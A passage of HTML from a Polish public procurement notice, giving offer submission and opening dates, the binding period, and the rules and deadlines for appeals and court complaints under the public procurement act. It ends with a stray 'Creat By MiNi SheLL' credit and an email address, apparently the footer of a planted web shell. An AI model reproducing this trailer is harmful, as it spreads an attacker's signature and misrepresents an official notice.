innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-21 07:15</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na Platformie ePUAP https://epuap.gov.pl/wps/portal i udostępnionego również na miniPortalu http://miniportalu.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-21 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Środki ochrony prawnej określone w niniejszym rozdziale przysługują Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może<br/>ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy uPzp.<br/>2. Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie zamówienia oraz dokumentów zamówienia przysługują również organizacjom wpisanym na listę,<br/>o której mowa w art. 469 pkt 15 uPzp oraz Rzecznikowi Małych i Średnich Przedsiębiorców.<br/>3. Odwołanie przysługuje na:<br/>a) niezgodną z przepisami ustawy czynność Zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, w tym na projektowane postanowienie umowy;<br/>b) zaniechanie czynności w postępowaniu o udzielenie zamówienia do której zamawiający był obowiązany na podstawie ustawy.<br/>4. Odwołanie wnosi się do Prezesa Izby. Odwołujący przekazuje kopię odwołania Zamawiającemu przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu.<br/>5. Odwołanie wobec treści ogłoszenia lub treści SWZ wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub treści SWZ na stronie internetowej.<br/>6. Odwołanie wnosi się w terminie:<br/>a) 5 dni od dnia przekazania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana przy użyciu środków komunikacji elektronicznej;<br/>b) 10 dni od dnia przekazania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana w sposób inny niż określony w lit. a).<br/>7. Odwołanie w przypadkach innych niż określone w pkt 5 i 6 wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.<br/>8. Na orzeczenie Izby oraz postanowienie Prezesa Izby, o którym mowa w art. 519 ust. 1 uPzp, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu.<br/>9. W postępowaniu toczącym się wskutek wniesienia skargi stosuje się odpowiednio przepisy ustawy z dnia 17 listopada 1964 r. - Kodeks postępowania cywilnego o apelacji, jeżeli przepisy<br/>niniejszego rozdziału nie stanowią inaczej.<br/>10. Skargę wnosi się do Sądu Okręgowego w Warszawie- sądu zamówień publicznych, zwanego dalej &#34;sądem zamówień publicznych&#34;.<br/>11. Skargę wnosi się za pośrednictwem Prezesa Izby, w terminie 14 dni od dnia doręczenia orzeczenia Izby lub postanowienia Prezesa Izby, o którym mowa w art. 519 ust. 1 uPzp przesyłając jednocześnie jej odpis przeciwnikowi skargi. Złożenie skargi w placówce pocztowej operatora wyznaczonego w rozumieniu ustawy z dnia 23 listopada 2012 r.- Prawo pocztowe jest<br/>równoznaczne z jej wniesieniem.<br/>12. Prezes Izby przekazuje skargę wraz z aktami postępowania odwoławczego do sądu zamówień publicznych w terminie 7 dni od dnia jej otrzymania.

Creat By MiNi SheLL
Email: jattceo@gmail.com